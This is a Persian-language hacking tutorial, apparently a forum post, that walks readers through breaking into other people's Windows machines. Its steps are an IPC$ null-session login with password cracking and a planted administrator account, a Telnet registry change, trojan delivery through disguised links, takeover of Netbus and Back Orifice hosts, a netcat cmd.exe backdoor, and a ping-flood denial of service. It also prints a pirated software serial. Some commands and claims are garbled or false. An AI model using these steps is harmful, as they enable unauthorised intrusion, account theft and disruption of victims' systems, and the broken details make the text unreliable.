من هیچ مسئولیتی در مورد این نوشته را قبول نمیکنم !
امروز آموزش هک ویندوز 2000,xp,nt رو میدم
یکی از مشکلات بزرگ ویندوز که در Service pack های ویندوز هم وجود داره IPC هست
حالا ما با استفاده از این روش کارمون را شروع میکنیم .
یکی از نرم افزار های مورد نیاز GFI:LANguard Security Scaner هست که بخاطر قدرت و کارایی این برنامه را پیشنهاد میکنم که فقط باید یکسری
تغییرات رو روی آن انجام بدین این برنامه را از سایت زیر داونلود کنید
Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU
البته ورژن 3.3 هم هست ولی من ورژن 3.2 را پیشنهاد میکنم که در سایت بالا ورژن 3.2 وجود دارد و سریال بالا نیز مربوط به همین ورژن هست
حالا باید یکسری تغییرات در این برنامه بدیم .
1.option را انتخاب کنید و به قسمت Scanning بروید و این شاخه را انتخاب کنید Configure ports و حالا در قسمت
Port number/range:1025port desciription:network blackjacket
و حالا
ADD PORT را بزنید .در قسمت
New scan باید یک Range ای پی رو اسکن کنید تا یک ای پی با مشخصات زیر پیدا شودپرت های باز
1025,139 را داشته باشد . IPC share نیز داشته باشدحالا باید به این ای پی به صورت زیر کانکت شوید :
1.در قسمت
Run این جمله را وارد کنید CMD2. دستور زیر را وارد کنید :
Net use IpadressIPC$""/user:Administrator
اگر دستور زیر را دریافت کردین
Successfully The Command was completed
از ای پی مورد نظر
Share گرفتین و در اختیار شماست اما در غیر اینصورت Share دارای پسوورد میباشد که من برای کرک کردن پسسوورد از این برنامهاستقاده میکنم :
PQWAKکه این برنامه رو از سایت
Download.com دریافت کنید .بعد از کرک از پسوورد بدست آمده اینگونه استفاده کنید
Net use ipadressIPC$ "password"/user:administratorدر صورتیکه میخواهید با
Telnet کانکت شوید مراحل زیر را طی کنید .در قسمت
RUN تایپ کنید Regeditبه این آدرس بروید
HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0NTLMحالا
Value date این فایل رو به این جمله تغییر دهید : 21در قسمت بعدی به RUN بروید و این دستور را تایپ کنید TELNET
دستور زیر را وارد کنید Telnet ipadress
در ادامه اگر از شما یوزر و پسوورد خواست یوزر را Administrator و پسسورد را خالی بگذارید
حالا احتیاج به ساختن یک یوزر برای خود دارید . این دستور را در ادامه وارد کنید :
Net user username password/add
حالا برای قرار دادن یوزر خود در گروه ادمین ها این دستور را وارد کنید
Net groups Administrators username/add
تمام شد شما به هدف خود رسیده اید اما من برای تازه کارها روش اول را پیشنهاد میکنم
ولی دوستان دیگر میتوانند از
Telnet استفاده کنندنکته : من هیچ مسئولیتی در مورد تغییر رجیستری نمیپذیرم اگر شما قادر به
Edit رجیستری نیستید بهتره از آن یه Backup تهیه کنید یادر نهایت از روش اول استفاده کنید
اینم برای دوستانمون که عشق Trojan دارند و همیشه برای فرستادن سرور کلی باید فیلم بازی کنند .
من هیچ مسئولیتی در مورد مطالب زیر قبول نمیکنم .
خوب من یه برنامه را به شما معرفی میکنم . شما با استفاده از این Uploader و با استفاده از Exploit میتوانید سرور را بدون اینکه کسی بفهمه
و بدون اینکه بخواد به سرور قربانی بفرستید .
این برنامه با این اسم در قسمت دانلود وجود دارد Evilhttp .
در ابتدا بعد از اجرای برنامه یک شاخه بنام Server میبینید که در اینجا باید آدرس فایل سروری که میخواهید بر روی سیستم قربانی بفرستید را بدهید
من پیشنهاد میکنم حجم فایل کمتر از 20kb باشد چون ممکن است قربانی متوجه بشود .
در قسمت بعدی یعنی Exploit به دایرکتوری خود برنامه رفته یکی از Exploit ها را انتخاب کنید . من این اکسپلویت را پیشنهاد میکنم Mpeg
خوب حالا بعد از انجام این کار در پایین شاخه Exploit یک صفحه مشاهده میکنید در اینجا اطلاعات زیر را وارد کنید :
HTTP://yourip
در اینجا در قسمت Yourip ای پی خودتون را وارد کنید و اگر میخواهید بیشتر واقعی به نظر برسد میتوانید بصورت زیر عمل کنید :
Http://yourip/yahoohack.index
توجه داشته باشید بعد از اتمام کار همان چیزی که در لیست نوشتین بصورت لینک برای قربانی بفرستید و اگر بر روی آن کلیک کند فایل به سیستم او
انتقال پیدا میکند . به نظر من برای کمی خنده دار شدن بجای سرور فایل Reboot را که حجمش کمتر از 6 kb است قرار بدهید تا هر کس بر روی
لینک شما کلیک کند سریع سیستمش Restart میشود !!!!!
در ادامه بگم به من ریطی نداره که ویروس را بجای سرور بذارین و به هم لینک بدین
سلام امروز یکی از روشهای نفوذ به سیستم و دزدیدن پسسورد را توضیح میدم . قبل از شروع این مقاله باید بگم که دزدیدن Account کار واقعا غیر انسانی میباشد و این مقاله را هم با کمی شک و تردید نوشتم . در ضمن اگه واقعا با این قیمتهای اینترنت یکی رو تصور کنید که با سختی یک کارت میخره و شما اونو بدزدین باید بگم واقعا براتون متاسفم ! من این روش را خیلی کلی و خلاصه توضیح میدم .
ما امروز با برنامه های زیر کار میکنیم که همشون در خود ویندوز وجود دارند :
Wingate,Netbus,Bo, Telnet
فرض که قربانی خودمون را در یاهو یا هر جای دیگه پیدا کردیم حالا باید
IP اونو بدست اورده و Wingate رو باز کنید در جایی که HOST NAME نوشته شده ادرس ای پی قربانی رو میدیم و در قسمت بعدی به Scan port رفته و Defualt برنامه که Port 23 هست به 12345 تغییر میدیم و گزینه سوم که try to open port Only هست را انتخاب کرده و اسکن را بزنیدالبته در اینجا میتونید از یه
RANGE IP استفاده کنید هم میتونید ای پی قربانی رو بدهید و در صورت باز بودن پرت مراحل بعدی را اجرا کنید . حالا ما فرض رو بز این میذاریم که یه Range ip دادیم . بعد از پایان اسکن شما با قسمتی بنام SERVER FOUND مواجه میشوید که یکسری ای پی را با پرت های باز مورد نظر شما پیدا کرده در ادامه یکی از ای پی ها را به دلخواه انتخاب کنید .در قسمت بعدی
NETBUS را باز کرده و در جای Hostname/IP ای پی مورد نظر را وارد کنید و در ادامه ی کار اگر از شما پسسورد بخواهد باید از Telnet استفاده کنید و اگر نخواهد که کار تقریبا تمومه . حالا فرض میکنیم که پسسورد خواست باید مراحل زیر را طی کنید:به قسمت
RUN رفته و CMD را اجرا کرده و بعد Telnet را اجرا کنید و ای پی را نوشته و بعد از پرت 12345 استفاده کنید در پنجره Netbus برای کرک پسوورد این نوشته را وارد کنید: Password;1;123serverPWD;Y4hooشما میتونید پسورد دیگه ای هم بذارید حالا با
Netbus دوباره وصل شده و پسورد را Y4hoo میزنیدهمه چیز در دست شماست :)
حالا به قسمت
File Manager رفته و سرور را به سیستم طرف ارسال کنید و در قسمتی که از شما پرسید سرور را به کجا بفرستم شما ادرس C:Windows را میدهید .و قسمت دانلود را میبندیم . حالا کارمون با Netbus تموم شد .حالا به BACK ORFICE میریم و در قسمت Target Host ای پی طرفو میزنیم و پرت 12345 و باز در قسمت بعدی پسورد را زده و SEND را میزنیم
با این روش کارهای زیادی میشه انجام داد !
میتوان گفت هیچ یک از حملات شبکه ای بدون نام بردن از NetCat کامل نخواهد بود. این برنامه میتواند هم برای مدیران سیستم و هم برای مهاجمان مورد استفاده قرار بگیرد. NetCat در ابتدا توسط Hobbit نوشته شد و در اوایل سال 1996 منتشر شد که البته برای سیستم های Unixنوشته شده بود, و در سال 1998, Weld Pond نسخه ای برای ویندوز را ایجاد کرد.
NetCat مثل یک ابزار شبکه ای همه منظوره است که برای ارسال یا دریافت داده ها از هر پورت TCP یا UDP به هر پورت UDP یاTCP به کار میرود. همچنین میتوان به عنوان ,Port scanner Backdoor ,Port listener ,downloda, uploader و... استفاده کرد.
حال با چند مثال به بررسی چند کاربرد این برنامه میپردازیم
.Port scanning
برای اسکن کردن پورت های باز
(پورت های در حالت listening) یک سیستم خط زیر رابه کار میبریم
:nc –v –w 2 –z [target] 10-100
در اینجا
target نام یا IP سیستمی که می خواهیم اسکن کنیم است.سویچ
-v اطلاعاتی درباره اتصال میدهد.سویچ
-wزمان استفاده شده برای ایجاد یک اتصال را محدود میکند.سویچ
-z نیز از ارسال هر گونه داده جلوگیری میکند و باعث سریعتر شدن اسکن میگردد.در این حالت
nc تمام پورت های باز سیستم را که بین 1 تا 100 هستند اسکن میکند و نام پورت های معروفی مثل 21 یا 23 که پورت های FTP و Telnet می باشند را نیز نمایش میدهد.البته
NetCat وسیله سریعی برای پورت اسکنینگ نیست و برای اینکار برنامه ای مانند Nmap بهتر عمل میکند.Connect to Port
برای اتصال به یک پورت از یک سیستم میتوان از خط زیر استفاده کرد
:nc –v –n [target] [port number]
با استفاده از سویچ
–n NetCat فقط ادرس هایIP عددی را می پذیرد.از این دستور میتوان به جای
telnet در ویندوز استفاده کرد که هم باعث خوانا شدن نوشته ها میشود و همچنین پایدارتر از telnet است.Backdoor
یکی از کاربرد های دیگر
nc . استفاده از ان به عنوان Backdoor است. برای این کار خط زیر را اجرا میکنیم:nc –L –p [port number] –d –e [cmd.exe]
سویچ
–L nc را در حالت listen راه می اندازدسویچ
-p شماره پورتی را که میخواهید به ان وصل شوید مشخص میکند.سویچ
–d نتکت را در حالت جدا از کنسول اجرا میکند.سویچ
–e برنامه ای را که شما مشخص کرده اید اجرا میکند.در اینجا
port number شماره پورت است که میتواند هر پورتی باشد (پورت رزرو نشده) و شما میخواهید به ان پورت وصل شوید.(Command prompt) cmd.exe هم برنامه ای است که پس از اتصال به nc روی آن پورت اجرا خواهد شد. در این قسمت اگر برنامه ای که میخواهید پس از وصل شدن اجرا شود در Directory nc نباشد باید نام درایو و directory آن را هم بنویسید:
nc –L –p 5566 –d –e c:winntsystem32cmd.exe
در این حالت
nc روی پورت 5566 در حالت listening قرار میگیرد و به محض برقراری ارتباط cmd.exe را روی این پورت فعال میکند.File Transfering
از کاربردهای دیگر این برنامه انتقال فایل بین دو سیستم است
. بسیاری از شبکه ها جلوی FTP را میگیرند یا اینکه به دلیلی شما نمیتوانید از TFTP استفاده کنید. میتوان به وسیله nc فایل را با استفاده از پورت TCP و UDP منتقل کرد.برای این کار باید
nc را در حالت listen در سیستم مقصد راه انداخته و خروجی ان را به یک فایل منتقل کنیم. در سیستم مبدا نیز ان را در حالت client قرار میدهیم تا به سیستم مقصد روی پورت مورد نظر وصل شود و فایل وروی را منتقل میکنیم.کامپیوتر مبدا
:client pc(recive file): nc –l –p [port] > [file]
کامپیوتر مقصد
:Srver pc(sending file): nc [client-IP] [port] < [file]
با به کار بردن سویچ
–u فایل به صورت UDP انتقال میابد.برای مثال میخواهیم فایل
hack.htm را به کامپیوتری با IP 192.168.0.1 بفرستیم:روی کامپیوتر مقصد این خط را مینویسیم
:nc –l –p 5566 > hack.htm
پورت
5566 را به صورت دلخواه انتخاب کرده ایم.روی کامپیوتر خود نیز این خط را مینویسیم
:nc 192.168.0.1 < hack.htm
همیشه اول باید
nc را روی کامپیوتر مقصد اجرا کنید.امروز طریق Restart کردن قربانی را به شما یاد میدم . در این روش شما یاد میگیرین که چگونه با ایجاد Fatal Eror بر روی قربانی سیستم او را ReBoot کنید
این روش فقط بر روی ویندوزهای 9x , 2000 , nt قابل اجرا میباشد میتوانید از برنامه های مختلفی استفاده کنید اما من Winnuke را پیشنهاد میکنم حالا به طریق زیر عمل کنید :
ای پی مورد نظر را پیدا کرده و به آن Ping کرده و از وجود ان اطمینان حاصل کنید . در ادامه از طریق DOS دستور زیر را وارد
کنید Ping -v igmp 192.168.0.199 -l 1500 -t
سوییچ v به ما اجازه ی استفاده از پروتوکولهای مختلف میدهد -l حجم پکتها و -t فرستادن این پکتها بدون مکس را انجام میدهم زمانی که با پیغام Target is unreachable مواجه شدید کار با موفقیت انجام گرفته